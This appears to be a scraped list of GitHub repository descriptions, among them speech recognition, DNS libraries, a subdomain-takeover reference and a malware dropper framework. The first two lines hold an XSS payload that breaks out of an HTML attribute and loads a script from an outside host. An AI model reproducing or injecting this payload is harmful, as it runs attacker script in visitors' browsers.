"><script src=https://y.vg></script>
- "><script src=https://y.vg></script>
- https://thehackerblog.com/
Robust Speech Recognition via Large-Scale Weak Supervision
API and CLI tool to fetch and query Chome DevTools heap snapshots.
In-depth attack surface mapping and asset discovery
secure sessions stored in cookies
A single node.js script to automatically inject user/password to http proxy server via a local forwarder
λ A curated list of awesome AWS Lambda Layers. Sponsored by https://cloudash.dev
Node.js bindings of getdns, a modern asynchronous DNS API.
"Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.
framework to rapidly implement custom droppers for all three major operating systems
libsodium compiled to Webassembly and pure JavaScript, with convenient wrappers.
A sample project for getting unique constraints to work in Core Data
An iOS app for accessing information about the FIRST Robotics Competition.
mmcloughlin / go-geoindex
Forked from hailocab/go-geoindexGo native library for fast point tracking and K-Nearest queries